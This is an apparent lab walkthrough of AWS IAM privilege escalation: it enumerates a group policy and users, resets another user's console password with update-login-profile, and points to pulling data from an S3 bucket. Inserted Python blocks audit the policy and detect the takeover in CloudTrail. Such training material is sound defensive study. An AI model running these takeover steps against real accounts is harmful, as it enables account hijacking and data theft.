iam:UpdateLoginProfile Solution

Christophe November 19, 2023

Using the provided Access Key ID and Secret Access Key, configure your AWS CLI profile.

aws configure --profile updatelogin

Enumerate your user’s permissions:

aws iam list-groups --profile updatelogin

{
    "Groups": [
        {
            "Path": "/",
            "GroupName": "iam-updateloginprofile-privesc-1701726668596-Developers",
            "GroupId": "AGPA5M7PA4Z555SJEHAYD",
            "Arn": "arn:aws:iam::921234892411:group/iam-updateloginprofile-privesc-1701726668596-Developers",
            "CreateDate": "2023-12-04T21:51:37+00:00"
        }
    ]
}

List policies for this group:

aws iam list-group-policies --group-name iam-updateloginprofile-privesc-1701726668596-Developers --profile updatelogin

{
    "PolicyNames": [
        "iam-updateloginprofile-privesc-1701726668596-policy"
    ]
}

Now list the permissions in this policy:

aws iam get-group-policy --group-name iam-updateloginprofile-privesc-1701726668596-Developers --policy-name iam-updateloginprofile-privesc-1701726668596-policy --profile updatelogin

{
    "GroupName": "iam-updateloginprofile-privesc-1701726668596-Developers",
    "PolicyName": "iam-updateloginprofile-privesc-1701726668596-policy",
    "PolicyDocument": {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Action": [
                    "iam:UpdateLoginProfile",
                    "iam:ListAccessKeys",
                    "iam:ListAttachedUserPolicies"
                ],
                "Resource": [
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Attacker",
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Mark",
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Bob"
                ],
                "Effect": "Allow"
            },
            {
                "Action": [
                    "iam:ListGroupPolicies",
                    "iam:ListPolicies",
                    "iam:ListPolicyVersions",
                    "iam:ListUserPolicies",
                    "iam:ListUsers",
                    "iam:ListGroups",
                    "iam:ListGroupsForUser",
                    "iam:GetPolicy",
                    "iam:GetPolicyVersion",
                    "iam:GetRole",
                    "iam:GetRolePolicy",
                    "iam:GetUser",
                    "iam:GetUserPolicy",
                    "iam:GetGroupPolicy"
                ],
                "Resource": "*",
                "Effect": "Allow"
            },
            {
                "Action": [
                    "s3:ListBucket"
                ],
                "Resource": "arn:aws:s3:::cybr-sensitive-data-bucket-921234892411",
                "Effect": "Allow"
            },
            {
                "Action": [
                    "s3:GetObject"
                ],
                "Resource": "arn:aws:s3:::cybr-sensitive-data-bucket-921234892411/*",
                "Effect": "Allow"
            },
            {
                "Action": [
                    "s3:ListAllMyBuckets",
                    "s3:GetBucketLocation"
                ],
                "Resource": "*",
                "Effect": "Allow"
            },
            {
                "Action": [
                    "iam:UpdateLoginProfile"
                ],
                "Resource": [
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Attacker",
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Mark",
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Alice"
                ],
                "Effect": "Deny"
            }
        ]
    }
}

Viewing your policy returns quite a bit of information, including that you are able to list users in this account:

aws iam list-users --profile updatelogin

{
    "Users": [
        {
            "Path": "/",
            "UserName": "iam-updateloginprofile-privesc-1701726668596-Alice",
            "UserId": "AIDA5M7PA4Z5VBTREZO3L",
            "Arn": "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Alice",
            "CreateDate": "2023-12-04T21:51:37+00:00"
        },
        {
            "Path": "/",
            "UserName": "iam-updateloginprofile-privesc-1701726668596-Attacker",
            "UserId": "AIDA5M7PA4Z5TE63N6QMD",
            "Arn": "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Attacker",
            "CreateDate": "2023-12-04T21:51:14+00:00"
        },
        {
            "Path": "/",
            "UserName": "iam-updateloginprofile-privesc-1701726668596-Bob",
            "UserId": "AIDA5M7PA4Z5SGDBSVMK6",
            "Arn": "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Bob",
            "CreateDate": "2023-12-04T21:51:37+00:00"
        },
        {
            "Path": "/",
            "UserName": "iam-updateloginprofile-privesc-1701726668596-Mark",
            "UserId": "AIDA5M7PA4Z57CYAWOOIP",
            "Arn": "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Mark",
            "CreateDate": "2023-12-04T21:51:37+00:00"
        }
    ]
}

This result shows us that there are multiple IAM users:

  • Alice
  • Bob
  • Mark

Which one should we attack?

Well, if we look at the IAM policy attached to our group, we have:

{
    "Action": [
        "iam:UpdateLoginProfile",
        "iam:ListAccessKeys",
        "iam:ListAttachedUserPolicies"
    ],
    "Resource": [
        "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Attacker",
        "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Mark",
        "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Bob"
    ],
    "Effect": "Allow"
}

But then we have an explicit deny:

{
    "Action": [
        "iam:UpdateLoginProfile"
    ],
    "Resource": [
        "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Attacker",
        "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Mark",
        "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Alice"
    ],
    "Effect": "Deny"
}

An explicit Deny always overrides an Allow, so we cannot call UpdateLoginProfile on Mark or Alice; it has to be Bob.
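The same Allow/Deny reasoning can be run as a policy audit. The following is an added example, not part of the original lesson: it evaluates the two iam:UpdateLoginProfile statements shown above and reports which user ARNs remain exposed. The function names are hypothetical, and the evaluator is a simplification that ignores Condition, NotAction and NotResource.

```python
import fnmatch

PREFIX = ("arn:aws:iam::921234892411:user/"
          "iam-updateloginprofile-privesc-1701726668596-")

# The two iam:UpdateLoginProfile statements from the group policy shown above.
POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Action": ["iam:UpdateLoginProfile", "iam:ListAccessKeys",
                    "iam:ListAttachedUserPolicies"],
         "Resource": [PREFIX + n for n in ("Attacker", "Mark", "Bob")]},
        {"Effect": "Deny",
         "Action": ["iam:UpdateLoginProfile"],
         "Resource": [PREFIX + n for n in ("Attacker", "Mark", "Alice")]},
    ],
}

def _as_list(value):
    # IAM accepts a single string or a list for Action and Resource.
    return [value] if isinstance(value, str) else list(value)

def _matches(patterns, value, ignore_case=False):
    # fnmatch covers the IAM wildcards * and ? (simplification: it also
    # treats [...] as a character class, which IAM does not).
    if ignore_case:
        value, patterns = value.lower(), [p.lower() for p in patterns]
    return any(fnmatch.fnmatchcase(value, p) for p in patterns)

def decision(policy, action, resource):
    """Return 'Deny', 'Allow' or 'ImplicitDeny' for one identity policy."""
    stmts = policy["Statement"]
    stmts = [stmts] if isinstance(stmts, dict) else stmts
    allowed = False
    for s in stmts:
        # Action names are case-insensitive; resource ARNs are not.
        if not _matches(_as_list(s["Action"]), action, ignore_case=True):
            continue
        if not _matches(_as_list(s["Resource"]), resource):
            continue
        if s["Effect"] == "Deny":
            return "Deny"  # an explicit deny wins over any allow
        allowed = True
    return "Allow" if allowed else "ImplicitDeny"

def exposed_users(policy, action, user_arns):
    """User ARNs on which `action` is effectively allowed by `policy`."""
    return [a for a in user_arns if decision(policy, action, a) == "Allow"]
```

Running `exposed_users` over the four users returned by `list-users` leaves only Bob, which is the gap a reviewer of this policy would need to close.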

aws iam update-login-profile --user-name iam-updateloginprofile-privesc-1701726668596-Bob --password 'JzreMu8KXF9RvTpb2sSRJqyd5uioMi' --no-password-reset-required --profile updatelogin

We can now use the username, the AWS account ID, and the password we set to log in to the AWS console:

https://signin.aws.amazon.com/signin

From there, you can access Amazon S3 to find a bucket containing sensitive data that you can then download.
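On the detection side, this sequence leaves a recognisable trail in CloudTrail: an UpdateLoginProfile call whose caller differs from the target user, followed by a console sign-in as that target. The following is an added example, not part of the original lesson; the records are constructed, trimmed to the fields used, and the user names and function name are placeholders.

```python
from datetime import datetime, timedelta

# Constructed CloudTrail records (trimmed); user names are placeholders.
EVENTS = [
    {"eventTime": "2023-12-04T22:10:05Z", "eventSource": "iam.amazonaws.com",
     "eventName": "UpdateLoginProfile",
     "userIdentity": {"type": "IAMUser", "userName": "lab-Attacker"},
     "requestParameters": {"userName": "lab-Bob", "passwordResetRequired": False}},
    {"eventTime": "2023-12-04T22:12:40Z", "eventSource": "signin.amazonaws.com",
     "eventName": "ConsoleLogin",
     "userIdentity": {"type": "IAMUser", "userName": "lab-Bob"},
     "responseElements": {"ConsoleLogin": "Success"}},
    {"eventTime": "2023-12-04T23:00:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "UpdateLoginProfile",
     "userIdentity": {"type": "IAMUser", "userName": "lab-Mark"},
     "requestParameters": {"userName": "lab-Mark", "passwordResetRequired": False}},
]

def _ts(event):
    return datetime.strptime(event["eventTime"], "%Y-%m-%dT%H:%M:%SZ")

def find_password_takeovers(events, window=timedelta(hours=1)):
    """Flag successful UpdateLoginProfile calls on another user's login
    profile and note whether that user signed in within `window` after."""
    events = sorted(events, key=_ts)
    findings = []
    for i, e in enumerate(events):
        if e.get("eventName") != "UpdateLoginProfile" or e.get("errorCode"):
            continue  # other API calls, or calls that were denied
        params = e.get("requestParameters") or {}
        caller = e["userIdentity"].get("userName")
        target = params.get("userName")
        if not target or caller == target:
            continue  # a user changing their own password
        login_followed = any(
            n.get("eventName") == "ConsoleLogin"
            and n["userIdentity"].get("userName") == target
            and (n.get("responseElements") or {}).get("ConsoleLogin") == "Success"
            and _ts(n) - _ts(e) <= window
            for n in events[i + 1:])
        findings.append({
            "caller": caller, "target": target,
            "reset_required": params.get("passwordResetRequired"),
            "console_login_followed": login_followed})
    return findings
```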
